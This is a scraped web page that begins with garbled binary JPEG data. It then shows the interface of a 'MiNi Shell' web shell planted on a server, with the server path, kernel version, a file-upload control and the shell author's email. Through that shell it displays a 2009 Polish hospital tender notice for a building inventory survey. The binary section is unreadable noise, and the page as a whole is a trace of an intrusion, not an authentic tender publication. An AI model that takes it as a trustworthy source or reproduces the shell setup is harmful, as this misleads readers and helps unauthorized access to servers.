JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090410/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090410/101922-N-2009.html

<p class="kh_header"><b>Gdańsk: PN-60/1/2009/INWENTARYZACJA</b><br>
<b>Numer ogłoszenia: 101922 - 2009; data zamieszczenia: 10.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Szpital Specjalistyczny św. Wojciecha Adalberta Samodzielny Publiczny Zakład Opieki Zdrowotnej , ul. Jana Pawła II 50, 80-462 Gdańsk, woj. pomorskie, tel. (058) 556 45 15, 7684281, faks (058) 556 36 18, 7614629.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpital.gda.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> PN-60/1/2009/INWENTARYZACJA.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest:
     1) Wykonanie dokumentacji - inwentaryzacji budowlanej, zgodnie z zestawieniem powierzchni zabudowy i kubatury obiektów budowlanych - Załącznik nr 4 do specyfikacji jak niżej:
          - budynku głównego Szpitala,
          - budynków pomocniczych Szpitala,
          - budynku Oddziału Leczenia Zeza i Niedowidzenia, ul. Wejhera w Gdańsku.
     2) Inwentaryzacje należy wykonać z podziałem na budynki, bloki jak ujęto w dokumentacji archiwalnej szpitala wraz z:
          - opisem funkcji pomieszczeń z podziałem na budynki, bloki,
          - ekspertyzami i opisami konstrukcyjnymi jako dokumentacji wyjściowej do sporządzenia operatu zabezpieczeń ppoż - w skali 1 : 100 - w formie graficznej-pisanej ( 5 egzemplarzy ) oraz w formie elektronicznej ( 1 egz. Wersji Autocad) 
         a) część opisowa:
           - ogólna, budowlano-funkcjonalna charakterystyka inwentaryzowanych obiektów wraz z podaniem powierzchni użytkowej i kubatury.
         b) część rysunkowa:
          - 	rzuty wszystkich kondygnacji, wszystkich obiektów kubaturowych będących przedmiotem inwentaryzacji, w skali 1:100 wraz z opisem funkcji pomieszczeń. Integralną częścią oferty jest rysunek precyzujący zestawienie pomieszczeń i powierzchni inwentaryzowanych budynków,
          -  przekroje inwentaryzowanych obiektów w skali 1:100 w ilości koniecznej do sporządzenia operatu ochrony ppoż (pkt. 1 ppkt. 2 specyfikacji),
          -  elewacje inwentaryzowanych obiektów.
     3)  Ekspertyzy i opisy konstrukcyjne  
2.  Podstawą do wykonania inwentaryzacji jest:
     -   dokumentacja archiwalna rzeczonych budynków, bloków,
     -   pomiary wykonane w terenie , 
      - ocena stanu rzeczywistego (wizja lokalna).
2.1 Wykonawca przystępujący do przetargu winien posiadać:
     - uprawnienia budowlane - projektowe,
     - certyfikowane, aktualne mierniki pomiarowe.
3.  Opracowana inwentaryzacja winna zostać sporządzona zgodnie z przepisami:
     - prawa, normami i zasadami wiedzy technicznej, przez osoby posiadające wymagane uprawnienia.
     - Kodeksu cywilnego 
     - Ustawy z dnia 29 stycznia 2004 roku Prawo zamówień publicznych.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.20.00.00-0.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 90.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> Wykonawca aby mógł być dopuszczony do udziału w postępowaniu przetargowym musi spełniać następujące warunki:
1) posiadać uprawnienia do występowania w obrocie prawym zgodnie z wymogami ustawowymi,
2) posiadać uprawnienia niezbędne do wykonania zamówienia , jeżeli uprawnienia takie są wymagane,
3) posiadać wiedzę, doświadczenie, potencjał ekonomiczny i techniczny, a także zespół osobowy zdolny do wykonania zamówienia,
4) znajdować się w sytuacji finansowej zapewniającej wykonanie zamówienia,
5) nie podlegać wykluczeniu z ubiegania się o zamówienie publiczne zgodnie z art. 24 ust. 1 i 2 ustawy,
6) spełniać wszystkie warunki zawarte w niniejszej specyfikacji,
Ocena spełnienia wyżej wymienionych warunków dokonana zostanie zgodnie z formułą spełnia - nie spełnia (ZP-17), w oparciu o informacje zawarte w dokumentach i oświadczeniach wyszczególnionych w Rozdz. III i IV pkt. 11. Z treści załączonych dokumentów i oświadczeń musi wynikać jednoznacznie, iż wyżej wymienione warunki Wykonawca spełnił. Uzupełnienie dokumentów jest możliwe po upływie terminu składania ofert na podstawie art. 26 ustawy..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> a) aktualny odpis albo zaświadczenie z właściwego organu rejestracyjnego, że Wykonawca jest uprawniony do występowania w obrocie prawnym, potwierdzające, że zakres działalności Wykonawcy odpowiada profilowi zamówienia objętych niniejszym postępowaniem przetargowym, ze wskazaniem osób upoważnionych do wykonywania czynności prawnych w imieniu Wykonawcy, wystawiony/uaktualniony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert , 
b) oświadczenie Wykonawcy, zgodnie z art. 22 ust. 1 ustawy /Załącznik Nr 3/,
c) wypełniony formularz ofert /Załącznik Nr 1/,	
d) wykaz wykonanych w okresie ostatnich 3 lat dokumentacji - inwentaryzacji, a jeżeli okres a jeżeli okres prowadzenia działalności jest krótszy - w tym krótszym okresie, odpowiadających swoim rodzajem i wartością usługom stanowiącym przedmiot zamówienia, z podaniem: ich wartości, daty i miejsca wykonywania
e) uprawnienia oraz zaświadczenia (kserokopie poświadczone za zgodność z oryginałem) z właściwej izby samorządu zawodowego, potwierdzające przynależność do izby inżynierów budownictwa (na dzień składania ofert),
f) oświadczenie Wykonawcy, że spełnia warunki udziału w przedmiotowym postępowaniu, zgodnie z art. 44, w związku z art. 22 ust. 1 ustawy,
g) oświadczenie Wykonawcy że wykonane projekty poszczególnych branż będą posiadały wymagane przez Zamawiającego właściwości użytkowe, wymogi budowlane i będą uwzględniały wymogi higieniczno-sanitarne wynikające z obowiązujących w tym zakresie przepisów prawnych jak też będą posiadały wymagane prawem uzgodnienia, pozwolenia - jeżeli dotyczy,
 h) Oświadczenie Wykonawcy, że opracowana dokumentacja projektowa będzie wykonana, zgodnie z zapisami, (według poniższej kolejności):
 - prawa, normami i zasadami wiedzy technicznej, przez osoby posiadające wymagane uprawnienia.
 - Kodeksu cywilnego 
 - Ustawy z dnia 29 stycznia 2004 roku Prawo zamówień publicznych,
 i)   harmonogram robót wykonywanych na poszczególnych budynkach, blokach..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.szpital.gda.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zamawiający i/lub www.szpital.gda.pl.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.04.2009 godzina 10:00, miejsce: Siedziba Zamawiającego, pok. 44 - Sekretariat Dyrektora.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com